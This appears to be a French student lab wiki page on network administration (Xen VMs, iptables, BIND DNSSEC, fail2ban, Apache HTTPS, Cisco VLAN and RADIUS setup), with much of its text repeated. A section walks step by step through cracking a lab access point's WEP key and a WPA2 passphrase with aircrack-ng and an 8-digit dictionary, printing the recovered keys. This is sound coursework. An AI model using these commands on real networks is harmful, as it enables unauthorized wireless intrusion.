Nom de domaine 1 (Billel) : '''dardevil.tech''' (le e manquant dans daredevil est une pure volonté du binôme et un choix pratique et judicieux pour ce TP ;) )

Bridge : '''pont_ironman'''

Réseau IPv4 : '''192.168.69.0/24'''

== Introduction ==

== Création du bridge ==
<syntaxhighlight lang="bash">
auto pont_ironman
iface pont_ironman inet manual
bridge_ports none
up ip link set $IFACE up
down ip link set $IFACE down
</syntaxhighlight><syntaxhighlight lang="bash">
ifup pont_ironman
</syntaxhighlight>

== Création des machines virtuelles ==
Nous avons '''créé nos trois machines''' sur le serveur capbreton via les commandes suivantes (nous avons mit la version excalibur de devuan sur la mandataire pour essayer) :<syntaxhighlight lang="bash">
root@capbreton:~# xen-create-image --hostname=SE4.batman --dhcp --bridge=pont_ironman --dir=/usr/local/xen --size=10GB --dist=daedalus --memory=2G
root@capbreton:~# xen-create-image --hostname=SE4.catwoman --dhcp --bridge=pont_ironman --dir=/usr/local/xen --size=10GB --dist=daedalus --memory=2G
root@capbreton:~# xen-create-image --hostname=SE4.superman --dhcp --bridge=pont_ironman --dir=/usr/local/xen --size=10GB --dist=excalibur --memory=2G
</syntaxhighlight>Ces commandes vous donnent un tableau récapitulatif avec un le '''root password''' qu'il faut noter pour pouvoir vous connecter (ce mdp est retrouvable dans le .cfg de la machine). Si vous souhaitez changer le mdp de votre machine, veiller à mettre un mdp '''robuste''' car cette machine sera sur internet.

xen create permet de '''démarrer les machines''' avec leur fichiers de configuration :<syntaxhighlight lang="bash">
xen create /etc/xen/SE4.batman.cfg
xen create /etc/xen/SE4.catwoman.cfg
xen create /etc/xen/SE4.superman.cfg
</syntaxhighlight>xen console permet d'<nowiki/>'''accéder à la console de la machine virtuelle''' (pour quitter la console un exit suffit et pour quitter la saisie de connection '''Ctrl + Shift + 5''') :<syntaxhighlight lang="bash">
xen console SE4.batman
xen console SE4.catwoman
xen console SE4.superman
</syntaxhighlight>

== Configuration de la machine de services ==

=== Montage des partitions /home et /var ===

==== Sur capbreton ====

Pour '''créer les partitions''' /home et /var on entre les deux commandes suivantes dans <code>/dev/virtual</code> de capbreton :<syntaxhighlight lang="bash">
lvcreate -n SE4.batman.home -L 10G virtual
lvcreate -n SE4.batman.var -L 10G virtual

</syntaxhighlight>Ensuite on vient ajouter les lignes suivante dans <code>/etc/xen/batman.cfg</code> :<syntaxhighlight lang="bash">
disk = [
'file:/usr/local/xen/domains/SE4.batman/disk.img,xvda2,w',
'file:/usr/local/xen/domains/SE4.batman/swap.img,xvda1,w',
'phy:/dev/virtual/SE4.batman.home,xvdb,w',
'phy:/dev/virtual/SE4.batman.var,xvdc,w',
]
</syntaxhighlight>

==== Sur la machine de service ====

Pour '''formater et monter''' les partitions nous utilisons les commandes suivantes ('''/!\ pas dans capbreton''') :<syntaxhighlight>
mkfs -t ext4 /dev/xvdb
mkfs -t ext4 /dev/xvdc
mount /dev/xvdb /mnt
mv /var/* /mnt
umount /mnt
mount -a

</syntaxhighlight>Ajouter ces lignes dans <code>/etc/fstab</code> afin que les partitions soient '''montées de façon automatiques''' au démarrage de la VM :<syntaxhighlight lang="bash">
/dev/xvdb /var ext4 defaults 0 2
/dev/xvdc /home ext4 defaults 0 2
</syntaxhighlight>Enfin vous pouvez '''redémarrer''' la VM sur capbreton : <syntaxhighlight lang="bash">
xen shutdown SE4.batman
xen create /etc/xen/SE4.batman.cfg
</syntaxhighlight>

=== Configuration réseau ===
On modifie le fichier <code>/etc/network/interfaces</code> comme suivant :<syntaxhighlight lang="bash">
auto lo
iface lo inet loopback

# IPv4
auto eth0
iface eth0 inet static
address 192.168.69.2/24 IPv4 de batman (service)
gateway 192.168.69.1 IPv4 de superman (mandataire)

# IPv6
auto eth1
iface eth1 inet6 auto
</syntaxhighlight>

== Configuration de la machine mandataire ==
On modifie le fichier <code>/etc/network/interfaces</code> comme suivant :<syntaxhighlight lang="bash">
auto lo
iface lo inet loopback

# IPv4
auto eth0
iface eth0 inet static
address 192.168.69.1/24 # IPv4 de superman (mandataire)

auto eth1
iface eth1 inet static
address 193.48.57.169/27 # IPv4 publique de superman
gateway 193.48.57.162

</syntaxhighlight>On modifie le fichier <code>/etc/xen/SE4.batman.cfg</code> sur capbreton<syntaxhighlight lang="bash">
vif = [ 'mac=00:16:3E:FA:18:CF,bridge=pont_ironman', 'mac=00:16:3E:FA:18:D0,bridge=SE4' ]
</syntaxhighlight>Une fois cela fait on peut '''redémarrer''' la VM avec les commandes précédentes. Ensuite sur batman on doit lancer l'interface :<syntaxhighlight lang="bash">
reboot
ifdown eth1; ifup eth1
</syntaxhighlight>
== Configuration SSH et Mascarade ==
Ces commandes permettent de '''synchroniser l'heure''' du système :<syntaxhighlight lang="bash">
apt update
apt install ntp ntpdate host
apt install ntpsec ntpsec-ntpdate host
date
</syntaxhighlight>
La mascarade se configure avec '''iptables''', et consiste à donne une adresse IPv4 qui permet d'accéder à internet. <syntaxhighlight lang="bash">
iptables -t nat -A POSTROUTING -j MASQUERADE -s 192.168.69.0/24
iptables-save

</syntaxhighlight>Dans les '''trois VMs''' on modifie <code>/etc/ssh/sshd_config</code> en ajoutant :
PermitRootLogin yes
On peut ensuite '''redémarrer''' le service ssh :
/etc/init.d/ssh restart
La '''redirection du port ssh''' ce fait via les commandes suivantes sur la machine mandataire :<syntaxhighlight lang="bash">
iptables -t nat -A PREROUTING -p tcp --dport 2202 -j DNAT --to-destination 192.168.69.2:22
iptables -t nat -A PREROUTING -p tcp --dport 2203 -j DNAT --to-destination 192.168.69.3:22
iptables-save

</syntaxhighlight>Dans le fichier <code>/etc/sysctl.conf</code> la ligne suivante doit être '''décommentée''' :<syntaxhighlight lang="bash">
net.ipv4.ip_forward=1
</syntaxhighlight>Nous avons aussi installer <code>iptables-persistent</code> pour éviter de perdre la configuration à chaque reboot.<syntaxhighlight lang="bash">
apt install iptables-persistant
</syntaxhighlight>Désormais le ssh peut être fait via les commandes suivantes :<syntaxhighlight lang="bash">
# ssh en IPV4
ssh root@<add_ipv4> -p 2202
# ssh en IPV6
ssh root@<add_ipv6>
</syntaxhighlight>

== DNS ==
On modifie le fichier <code>/etc/bind/named.conf.local</code> afin de fait passer par notre DNS et d'avoir le second DNS en backup :<syntaxhighlight lang="bash">
dnssec-policy "dnspol" {
keys {
ksk key-directory lifetime unlimited algorithm 13;
zsk key-directory lifetime unlimited algorithm 13;
};
nsec3param;
};

zone "deadpool.tech" {
type master;
file "/etc/bind/db.deadpool.tech";
allow-transfer{secondaries;};
notify yes;
key-directory "/etc/bind/keys";
dnssec-policy "dnspol";
inline-signing yes;
};

acl "secondaries" {
192.168.69.3;
2001:660:4401:60a0:216:3eff:fe8f:4743;
};

zone "dardevil.tech" {
type secondary;
file "/etc/bind/backup/db.dardevil.tech";
masters{2001:660:4401:60a0:216:3eff:fe8f:4743;};
};
</syntaxhighlight>Création d'un dossier zones dans <code>/etc/bind</code> et y créer le fichier <code>db.deadpool.tech</code><syntaxhighlight lang="bash">
$TTL 400

@ IN SOA ns.deadpool.tech. admin.deadpool.tech. (
3609 ; Version
21600 ; Refresh
3600 ; Retry
2592000 ; Expire
86400 ; Minimum TTL

);

@ IN NS ns.dardevil.tech.
@ IN NS ns.deadpool.tech.

ns IN A 193.48.57.169
ns IN AAAA 2001:660:4401:60a0:216:3eff:fe8f:4743
@ IN A 193.48.57.169
@ IN AAAA 2001:660:4401:60a0:216:3eff:fe8f:4743

www IN CNAME deadpool.tech.
</syntaxhighlight>
Modification du fichier <code>/etc/resolv.conf</code> (il faut '''commenter''' tous les autres servers)<syntaxhighlight lang="bash">
search deadpool.tech
search dardevil.tech
nameserver 192.168.69.2
nameserver 192.168.69.3
</syntaxhighlight>Pour '''restart''' le service <syntaxhighlight lang="bash">
service named restart
</syntaxhighlight>

Génération de la clé pour le certificat sur batman<syntaxhighlight lang="bash">
openssl req -nodes -newkey rsa:2048 -sha256 -keyout deadpool.tech.key -out ddeadpool.csr

Country Name (2 letter code) [AU]:FR
State or Province Name (full name) [Some-State]:Nord
Locality Name (eg, city) []:Lille
Organization Name (eg, company) [Internet Widgits Pty Ltd]:PolytechLille
Organizational Unit Name (eg, section) []:IOT
Common Name (e.g. server FQDN or YOUR name) []:deadpool.tech
Email Address []:antonin.biernacki@polytech-lille.net
</syntaxhighlight>Sur catwoman<syntaxhighlight lang="shell">
openssl req -nodes -newkey rsa:2048 -sha256 -keyout dardevil.tech.key -out dardevil.csr

Country Name (2 letter code) [AU]:FR
State or Province Name (full name) [Some-State]:Nord
Locality Name (eg, city) []:Lille
Organization Name (eg, company) [Internet Widgits Pty Ltd]:PolytechLille
Organizational Unit Name (eg, section) []:IOT
Common Name (e.g. server FQDN or YOUR name) []:dardevil.tech
Email Address []:billel.cheklat@polytech-lille.net
</syntaxhighlight>Creation d'un repertoire keys avec les droits nécessaires<syntaxhighlight lang="bash">
mkdir /etc/bind/keys
chown bind:bind /etc/bind/keys
chmod 750 /etc/bind/keys
</syntaxhighlight>

Modification du fichier /etc/resolv.conf (il faut commenter tous les autres servers)<syntaxhighlight lang="bash">
search deadpool.tech
search dardevil.tech
nameserver 192.168.69.2
nameserver 192.168.69.3
</syntaxhighlight>Pour restart le service <syntaxhighlight lang="bash">
service named restart
</syntaxhighlight>Si il y a des erreurs la commande suivante permet de les identifier<syntaxhighlight lang="bash">
named-checkconf /etc/bind/named.conf
</syntaxhighlight>Pour tester le DNS depuis la machine de service<syntaxhighlight lang="bash">
dig @localhost deadpool.tech
</syntaxhighlight>Modification sur Gandi au niveau des deux noms de domaine

Création d'un blue record pour chacun des noms de domaine<syntaxhighlight>
ns.deadpool.tech
193.48.57.169 // adresse IPv4 de la mandataire
2001:660:4401:60a0:216:3eff:fefa:18d0 // adresse IPv6 de la machine de service
</syntaxhighlight>Ajout de external nameserver pour chacun des deux noms de domaine<syntaxhighlight>
ns.deadpool.tech // nom de domaine
ns.dardevil.tech // l'autre nom de domaine
</syntaxhighlight>Pour tester depuis l'extérieur<syntaxhighlight lang="bash">
dig deadpool.tech
</syntaxhighlight>

=== Fail2ban ===
Il faut commencer par installer fail2ban

Ensuite il faut créer un fichier jail.local dans le dossier /etc/fail2ban
<syntaxhighlight>
[sshd]
enable = true
port = ssh
filter = sshd
maxretry = 5
findtime = 300
bantime = 600
</syntaxhighlight>Pour éviter un warning sur allowipv6 il faut décommenter les lignes suivantes dans fail2ban.conf (ligne 58 à 62)<syntaxhighlight>
Option: allowipv6
Notes.: Allows IPv6 interface:
Default: auto
Values: [ auto yes (on, true, 1) no (off, false, 0) ] Default: auto
allowipv6 = auto
</syntaxhighlight>

Enfin pour lancer le service il faut rentrer la cmd suivante
<syntaxhighlight lang="bash">
service fail2ban restart
</syntaxhighlight>

=== HTTPS ===
Dans le dossier /etc/apache2/sites-available

On met la clef deadpool.tech.key et les certificats GandiCert.pem et deadpool.tech.crt (tout a été trouvé sur Gandi)<syntaxhighlight lang="bash">
<VirtualHost *:80>
ServerName deadpool.tech
ServerAlias www.deadpool.tech
Redirect permanent / https://deadpool.tech/
</VirtualHost>

<VirtualHost *:443>
ServerAdmin webmaster@localhost

DocumentRoot /var/www/html

ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined

SSLEngine on

SSLCertificateFile /etc/apache2/sites-available/deadpool.tech.crt
SSLCertificateKeyFile /etc/apache2/sites-available/deadpool.tech.key
SSLCertificateChainFile /etc/apache2/sites-available/GandiCert.pem

<FilesMatch "\.(?:cgi|shtml|phtml|php)$">
SSLOptions +StdEnvVars
</FilesMatch>
<Directory /usr/lib/cgi-bin>
SSLOptions +StdEnvVars
</Directory>

</VirtualHost>
</syntaxhighlight>
On entre ensuite les cmd suivantes<syntaxhighlight lang="bash">
a2enmod ssl
service apache restart
a2ensite default-ssl.conf
service apache2 reload
</syntaxhighlight>

== Effraction WIFI ==

=== Cassage de clef WEP d’un point d’accès WiFi ===
'''/!\''' Dans notre cas la carte réseau de notre zabeth ne fonctionnait plus (ce cas est courant).

Mr Redon nous a donc fournit une '''clé USB Wifi''' pour pouvoir travailler.

De plus les cracotte s'arrête au 13 donc je dois prendre la '''cracotte02'''.

La commande suivante permet de d''''identifier l'interface WIFI''' qui nous intéresse :<syntaxhighlight lang="bash">
ip link
</syntaxhighlight>Ici l'interface qui nous intéresse est wlx40a5efd21410. Donc nous pouvons lancer la commande suivante afin d'<nowiki/>'''identifier l'adresse IP de notre cracotte02'''.<syntaxhighlight lang="bash">
sudo airodump-ng wlx40a5efd21410
</syntaxhighlight>Dans la liste nous avons en effet la cracotte02 sur le channel 4 et l'adresse ip suivante :<syntaxhighlight lang="bash">
04:DA:D2:9C:50:51 -62 231 0 0 4 54e. WEP WEP cracotte02
</syntaxhighlight>Enfin nous pouvons '''lancer le cassage''' de la clé avec cette commande :<syntaxhighlight lang="bash">
sudo airodump-ng wlx40a5efd21410 --bssid 04:DA:D2:9C:50:51 -c4 --write log_airodump
</syntaxhighlight>Le nombre de la section DATA doit augmenter asser vite (sinon il y a un problème) :

Après un certain temps on peut entrer la commande suivante pour '''voir si la clé à été trouvée''' (le numéro, ici 5, dépend du nombre de fois ou la commande précédente a été lancé) :<syntaxhighlight lang="bash">
aircrack-ng log_airodump-05.cap
</syntaxhighlight>Le résultat suivant est le bon on a un '''KEY FOUND''' !!<syntaxhighlight lang="bash">
Aircrack-ng 1.7

[00:00:00] Tested 808 keys (got 54157 IVs)

KB depth byte(vote)
0 0/ 13 FF(75008) AF(66048) C6(65536) A6(62464) E3(61952) 20(61696) EC(61696) E8(61440) 13(61184) 30(61184) F3(61184) FD(60928) F1(60672) 27(60416) 41(60416) 5D(60416) 8D(60416)
1 0/ 1 01(81152) 78(64256) 13(63232) AC(63232) E6(62720) 48(61952) 91(61952) 92(61696) AB(61696) 74(61440) 56(61184) A8(61184) 4A(60928) C9(60928) 17(60672) 35(60416) F2(60416)
2 9/ 2 D2(60416) D5(60160) DF(60160) 44(59904) 7A(59904) 99(59904) AD(59904) 15(59648) 2A(59648) 31(59648) 67(59648) E6(59648) 0D(59392) 16(59392) 7E(59392) DC(59392) 5B(59136)
3 0/ 1 08(79360) 1D(63744) 7D(61952) 1B(61184) CB(60928) A3(60672) 85(60160) 58(59904) AC(59904) 11(59648) 53(59648) 9C(59648) EA(59648) 81(59392) 84(59392) AA(59392) B1(59392)
4 8/ 4 9A(61440) 22(61184) DB(61184) D7(60928) 48(60672) 88(60672) 36(60416) 14(59904) 57(59904) 5C(59904) 8D(59904) CF(59904) 04(59136) 20(58880) 39(58880) B4(58880) D5(58880)

KEY FOUND! [ FF:FF:FF:FF:FA:BC:03:CB:AE:EE:EE:EE:EE ]
Decrypted correctly: 100%
</syntaxhighlight>

=== Cassage de mot de passe WPA-PSK par force brute ===
On s'intéresse maintenant à la '''kracotte02''' (information trouvable par la commande de la section précédente) :<syntaxhighlight lang="bash">
44:AD:D9:5F:87:01 -47 5 0 0 13 54e. WPA2 CCMP PSK kracotte02
</syntaxhighlight>

Pour forcer ce mot de passe par force brut nous créons via un '''fichier Python''' un dictionnaire contenant '''toutes les possibilités sur 8 chiffres'''. Le contenu de ce fichier est le suivant :<syntaxhighlight lang="python3">
with open("dictionnaire_8_chiffres.txt", "w") as f:
for i in range(100000000):
f.write(f"{i:08d}\n")
</syntaxhighlight>
Lancer ce programme afin de créer le fichier dictionnaire_8_chiffres.txt.

La commande suivante est nécessaire pour que aircrack-ng utilise notre dictionnaire :<syntaxhighlight lang="bash">
sudo aircrack-ng -w dictionnaire_8_chiffres.txt -b 44:AD:D9:5F:87:01
</syntaxhighlight>Nous pouvons enfin '''lancer le cassage du mot de passe''' par force brute via cette commande :<syntaxhighlight lang="bash">
sudo airodump-ng wlx40a5efd21410 --write airodumpWPA --bssid 44:AD:D9:5F:87:01 -c13
</syntaxhighlight>La commande ci-dessous permet de '''savoir si le mot de passe à été trouvé''' (/!\ cela peut prendre du temps selon la valeur de la clé, dans notre cas plus de 30min) :<syntaxhighlight lang="bash">
sudo aircrack-ng -w dictionnaire_8_chiffres.txt -b 44:AD:D9:5F:87:01 airodumpWPA-03.cap
</syntaxhighlight>Nous avons le bon résultat un nouveau '''KEY FOUND''' !!<syntaxhighlight lang="bash">

Aircrack-ng 1.7

[00:37:28] 66655552/100000000 keys tested (29360.85 k/s)

Time left: 18 minutes, 55 seconds 66.66%

KEY FOUND! [ 66688666 ]

Master Key : A4 3E 9E 85 7D D3 4E 0C 2C D4 D9 1C 4F 08 1A 0C
B4 BA B2 64 8C 24 38 C5 DD 27 81 8E CE 2C F4 CA

Transient Key : AA 75 80 E5 F3 77 C2 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

EAPOL HMAC : 97 42 1A DB B7 EE FB 19 C3 7C EA 9E 29 99 0A 4B
</syntaxhighlight>

=== Vlan ===
Depuis la machine batman on se ssh sur le routeur<syntaxhighlight lang="bash">
ssh -oKexAlgorithms=+diffie-hellman-group14-sha1 -oHostKeyAlgorithms=+ssh-rsa -oCiphers=+aes128-cbc admin@172.27.0.1
</syntaxhighlight>

Entrez ensuite les commandes suivantes pour le dhcp :<syntaxhighlight lang="bash">
C9200-E304>en
C9200-E304>configure
C9200-E304(config)#ip dhcp pool PoolAntonin
C9200-E304(dhcp-config)#network 10.60.14.0 255.255.255.0
C9200-E304(dhcp-config)#dns-server 193.48.57.169
C9200-E304(dhcp-config)#default-router 10.60.14.254
C9200-E304(dhcp-config)#exit
C9200-E304(config)#exit
C9200-E304>write

</syntaxhighlight>Enfin pour vérifier les commandes ont données ce que l'on souhaite<syntaxhighlight lang="bash">
C9200-E304#show running-config
</syntaxhighlight>

Création du Vlan24<syntaxhighlight lang="bash">
C9200-E304>en
C9200-E304>configure
C9200-E304(config)#Vlan 24
C9200-E304(vlan-config)#name PoolAntonin
C9200-E304(vlan-config)#exit
C9200-E304(config)#exit
C9200-E304>write

</syntaxhighlight>

Pour VRRP on peut entrer les commandes suivantes<syntaxhighlight lang="bash">
C9200-E304(config)#interface Vlan24
C9200-E304(config-if)#ip address 10.60.14.2 255.255.255.0
C9200-E304(config-if)#ipv6 address 2001:660:4401:60ae::2/64
C9200-E304(config-if)#vrrp 24 address-family ipv4
C9200-E304(config-if-vrrp)#priority 110
C9200-E304(config-if-vrrp)#address 10.60.14.1 primary
C9200-E304(config-if-vrrp)#exit-vrrp
C9200-E304(config-if)#end
</syntaxhighlight>

Pour se ssh sur le wifi<syntaxhighlight lang="bash">
ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 -oHostKeyAlgorithms=+ssh-rsa -oCiphers=+aes128-cbc admin@172.27.0.4
</syntaxhighlight>
On entre ensuite ces commandes :<syntaxhighlight lang="bash">
conf t

aaa new-model
aaa authentication login eap_student14 group radius_student14
radius-server host 192.168.69.3 auth-port 1812 acct-port 1813 key secret_student14
aaa group server radius radius_student14
server 192.168.69.3 auth-port 1812 acct-port 1813
exit

dot11 ssid VM_SERVICES_14
vlan 24
authentication open eap eap_student14
authentication network-eap eap_student14
authentication key-management wpa
mbssid guest-mode
exit

interface Dot11Radio0
encryption vlan 24 mode ciphers aes-ccm
exit

interface Dot11Radio0.24
encapsulation dot1Q 24
bridge-group 24
exit

interface GigabitEthernet0.24
encapsulation dot1Q 24
bridge-group 24
exit

interface Dot11Radio0
ssid VM_SERVICES_14
exit
</syntaxhighlight>

2001:660:4401:60a0:216:3eff:fe19:f03c

Atelier SysRes SE4 2025/2026 E14

2026-02-15T11:09:08Z

Abiernac :

'''BIERNACKI Antonin'''

IOT 4

2025-2026

== Infos concernant notre binôme ==
Binôme : '''CHEKLAT Billel''' [[Atelier SysRes SE4 2025/2026 E13]]

Mandataire : '''superman'''

IP publique de la mandataire : '''193.48.57.169'''

Service 1 (Antonin) : '''batman'''

Nom de domaine 1 (Antonin) : '''deadpool.tech'''

Nom service 2 (Billel) : '''catwoman'''

Nom de domaine 1 (Billel) : '''dardevil.tech''' (le e manquant dans daredevil est une pure volonté du binôme et un choix pratique et judicieux pour ce TP ;) )

Bridge : '''pont_ironman'''

Réseau IPv4 : '''192.168.69.0/24'''

== Introduction ==

== Création du bridge ==
<syntaxhighlight lang="bash">
auto pont_ironman
iface pont_ironman inet manual
bridge_ports none
up ip link set $IFACE up
down ip link set $IFACE down
</syntaxhighlight><syntaxhighlight lang="bash">
ifup pont_ironman
</syntaxhighlight>

== Création des machines virtuelles ==
Nous avons '''créé nos trois machines''' sur le serveur capbreton via les commandes suivantes (nous avons mit la version excalibur de devuan sur la mandataire pour essayer) :<syntaxhighlight lang="bash">
root@capbreton:~# xen-create-image --hostname=SE4.batman --dhcp --bridge=pont_ironman --dir=/usr/local/xen --size=10GB --dist=daedalus --memory=2G
root@capbreton:~# xen-create-image --hostname=SE4.catwoman --dhcp --bridge=pont_ironman --dir=/usr/local/xen --size=10GB --dist=daedalus --memory=2G
root@capbreton:~# xen-create-image --hostname=SE4.superman --dhcp --bridge=pont_ironman --dir=/usr/local/xen --size=10GB --dist=excalibur --memory=2G
</syntaxhighlight>Ces commandes vous donnent un tableau récapitulatif avec un le '''root password''' qu'il faut noter pour pouvoir vous connecter (ce mdp est retrouvable dans le .cfg de la machine). Si vous souhaitez changer le mdp de votre machine, veiller à mettre un mdp '''robuste''' car cette machine sera sur internet.

xen create permet de '''démarrer les machines''' avec leur fichiers de configuration :<syntaxhighlight lang="bash">
xen create /etc/xen/SE4.batman.cfg
xen create /etc/xen/SE4.catwoman.cfg
xen create /etc/xen/SE4.superman.cfg
</syntaxhighlight>xen console permet d'<nowiki/>'''accéder à la console de la machine virtuelle''' (pour quitter la console un exit suffit et pour quitter la saisie de connection '''Ctrl + Shift + 5''') :<syntaxhighlight lang="bash">
xen console SE4.batman
xen console SE4.catwoman
xen console SE4.superman
</syntaxhighlight>

== Configuration de la machine de services ==

=== Montage des partitions /home et /var ===

==== Sur capbreton ====

Pour '''créer les partitions''' /home et /var on entre les deux commandes suivantes dans <code>/dev/virtual</code> de capbreton :<syntaxhighlight lang="bash">
lvcreate -n SE4.batman.home -L 10G virtual
lvcreate -n SE4.batman.var -L 10G virtual

</syntaxhighlight>Ensuite on vient ajouter les lignes suivante dans <code>/etc/xen/batman.cfg</code> :<syntaxhighlight lang="bash">
disk = [
'file:/usr/local/xen/domains/SE4.batman/disk.img,xvda2,w',
'file:/usr/local/xen/domains/SE4.batman/swap.img,xvda1,w',
'phy:/dev/virtual/SE4.batman.home,xvdb,w',
'phy:/dev/virtual/SE4.batman.var,xvdc,w',
]
</syntaxhighlight>

==== Sur la machine de service ====

Pour '''formater et monter''' les partitions nous utilisons les commandes suivantes ('''/!\ pas dans capbreton''') :<syntaxhighlight>
mkfs -t ext4 /dev/xvdb
mkfs -t ext4 /dev/xvdc
mount /dev/xvdb /mnt
mv /var/* /mnt
umount /mnt
mount -a

</syntaxhighlight>Ajouter ces lignes dans <code>/etc/fstab</code> afin que les partitions soient '''montées de façon automatiques''' au démarrage de la VM :<syntaxhighlight lang="bash">
/dev/xvdb /var ext4 defaults 0 2
/dev/xvdc /home ext4 defaults 0 2
</syntaxhighlight>Enfin vous pouvez '''redémarrer''' la VM sur capbreton : <syntaxhighlight lang="bash">
xen shutdown SE4.batman
xen create /etc/xen/SE4.batman.cfg
</syntaxhighlight>

=== Configuration réseau ===
On modifie le fichier <code>/etc/network/interfaces</code> comme suivant :<syntaxhighlight lang="bash">
auto lo
iface lo inet loopback

# IPv4
auto eth0
iface eth0 inet static
address 192.168.69.2/24 IPv4 de batman (service)
gateway 192.168.69.1 IPv4 de superman (mandataire)

# IPv6
auto eth1
iface eth1 inet6 auto
</syntaxhighlight>

== Configuration de la machine mandataire ==
On modifie le fichier <code>/etc/network/interfaces</code> comme suivant :<syntaxhighlight lang="bash">
auto lo
iface lo inet loopback

# IPv4
auto eth0
iface eth0 inet static
address 192.168.69.1/24 # IPv4 de superman (mandataire)

auto eth1
iface eth1 inet static
address 193.48.57.169/27 # IPv4 publique de superman
gateway 193.48.57.162

</syntaxhighlight>On modifie le fichier <code>/etc/xen/SE4.batman.cfg</code> sur capbreton<syntaxhighlight lang="bash">
vif = [ 'mac=00:16:3E:FA:18:CF,bridge=pont_ironman', 'mac=00:16:3E:FA:18:D0,bridge=SE4' ]
</syntaxhighlight>Une fois cela fait on peut '''redémarrer''' la VM avec les commandes précédentes. Ensuite sur batman on doit lancer l'interface :<syntaxhighlight lang="bash">
reboot
ifdown eth1; ifup eth1
</syntaxhighlight>
== Configuration SSH et Mascarade ==
Ces commandes permettent de '''synchroniser l'heure''' du système :<syntaxhighlight lang="bash">
apt update
apt install ntp ntpdate host
apt install ntpsec ntpsec-ntpdate host
date
</syntaxhighlight>
La mascarade se configure avec '''iptables''', et consiste à donne une adresse IPv4 qui permet d'accéder à internet. <syntaxhighlight lang="bash">
iptables -t nat -A POSTROUTING -j MASQUERADE -s 192.168.69.0/24
iptables-save

</syntaxhighlight>Dans les '''trois VMs''' on modifie <code>/etc/ssh/sshd_config</code> en ajoutant :
PermitRootLogin yes
On peut ensuite '''redémarrer''' le service ssh :
/etc/init.d/ssh restart
La '''redirection du port ssh''' ce fait via les commandes suivantes sur la machine mandataire :<syntaxhighlight lang="bash">
iptables -t nat -A PREROUTING -p tcp --dport 2202 -j DNAT --to-destination 192.168.69.2:22
iptables -t nat -A PREROUTING -p tcp --dport 2203 -j DNAT --to-destination 192.168.69.3:22
iptables-save

</syntaxhighlight>Dans le fichier <code>/etc/sysctl.conf</code> la ligne suivante doit être '''décommentée''' :<syntaxhighlight lang="bash">
net.ipv4.ip_forward=1
</syntaxhighlight>Nous avons aussi installer <code>iptables-persistent</code> pour éviter de perdre la configuration à chaque reboot.<syntaxhighlight lang="bash">
apt install iptables-persistant
</syntaxhighlight>Désormais le ssh peut être fait via les commandes suivantes :<syntaxhighlight lang="bash">
# ssh en IPV4
ssh root@<add_ipv4> -p 2202
# ssh en IPV6
ssh root@<add_ipv6>
</syntaxhighlight>

Génération de la clé pour le certificat sur batman<syntaxhighlight lang="bash">
openssl req -nodes -newkey rsa:2048 -sha256 -keyout deadpool.tech.key -out ddeadpool.csr

Country Name (2 letter code) [AU]:FR
State or Province Name (full name) [Some-State]:Nord
Locality Name (eg, city) []:Lille
Organization Name (eg, company) [Internet Widgits Pty Ltd]:PolytechLille
Organizational Unit Name (eg, section) []:IOT
Common Name (e.g. server FQDN or YOUR name) []:deadpool.tech
Email Address []:antonin.biernacki@polytech-lille.net
</syntaxhighlight>Sur catwoman<syntaxhighlight lang="shell">
openssl req -nodes -newkey rsa:2048 -sha256 -keyout dardevil.tech.key -out dardevil.csr

Country Name (2 letter code) [AU]:FR
State or Province Name (full name) [Some-State]:Nord
Locality Name (eg, city) []:Lille
Organization Name (eg, company) [Internet Widgits Pty Ltd]:PolytechLille
Organizational Unit Name (eg, section) []:IOT
Common Name (e.g. server FQDN or YOUR name) []:dardevil.tech
Email Address []:billel.cheklat@polytech-lille.net
</syntaxhighlight>Creation d'un repertoire keys avec les droits nécessaires<syntaxhighlight lang="bash">
mkdir /etc/bind/keys
chown bind:bind /etc/bind/keys
chmod 750 /etc/bind/keys
</syntaxhighlight>DNS

Modification de /etc/bind/named.conf.local<syntaxhighlight lang="bash">
dnssec-policy "dnspol" {
keys {
ksk key-directory lifetime unlimited algorithm 13;
zsk key-directory lifetime unlimited algorithm 13;
};
nsec3param;
};

zone "deadpool.tech" {
type master;
file "/etc/bind/db.deadpool.tech";
allow-transfer{secondaries;};
notify yes;
key-directory "/etc/bind/keys";
dnssec-policy "dnspol";
inline-signing yes;
};

acl "secondaries" {
192.168.69.3;
2001:660:4401:60a0:216:3eff:fe8f:4743;
};

PARTIE COMMENTEE
zone "dardevil.tech" {
type secondary;
file "/etc/bind/backup/db.dardevil.tech";
masters{2001:660:4401:60a0:216:3eff:fe8f:4743;};
};
</syntaxhighlight>Création d'un dossier zones dans /etc/bind et y créer le fichier db.deadpool.tech<syntaxhighlight lang="bash">
$TTL 400

@ IN SOA ns.deadpool.tech. admin.deadpool.tech. (
3609 ; Version
21600 ; Refresh
3600 ; Retry
2592000 ; Expire
86400 ; Minimum TTL

);

@ IN NS ns.dardevil.tech.
@ IN NS ns.deadpool.tech.

ns IN A 193.48.57.169
ns IN AAAA 2001:660:4401:60a0:216:3eff:fe8f:4743
@ IN A 193.48.57.169
@ IN AAAA 2001:660:4401:60a0:216:3eff:fe8f:4743

www IN CNAME deadpool.tech.
</syntaxhighlight>Modification du fichier /etc/resolv.conf (il faut commenter tous les autres servers)<syntaxhighlight lang="bash">
search deadpool.tech
search dardevil.tech
nameserver 192.168.69.2
nameserver 192.168.69.3
</syntaxhighlight>Pour restart le service <syntaxhighlight lang="bash">
service named restart
</syntaxhighlight>Si il y a des erreurs la commande suivante permet de les identifier<syntaxhighlight lang="bash">
named-checkconf /etc/bind/named.conf
</syntaxhighlight>Pour tester le DNS depuis la machine de service<syntaxhighlight lang="bash">
dig @localhost deadpool.tech
</syntaxhighlight>Modification sur Gandi au niveau des deux noms de domaine

Création d'un blue record pour chacun des noms de domaine<syntaxhighlight>
ns.deadpool.tech
193.48.57.169 // adresse IPv4 de la mandataire
2001:660:4401:60a0:216:3eff:fefa:18d0 // adresse IPv6 de la machine de service
</syntaxhighlight>Ajout de external nameserver pour chacun des deux noms de domaine<syntaxhighlight>
ns.deadpool.tech // nom de domaine
ns.dardevil.tech // l'autre nom de domaine
</syntaxhighlight>Pour tester depuis l'extérieur<syntaxhighlight lang="bash">
dig deadpool.tech
</syntaxhighlight>

=== Fail2ban ===
Il faut commencer par installer fail2ban

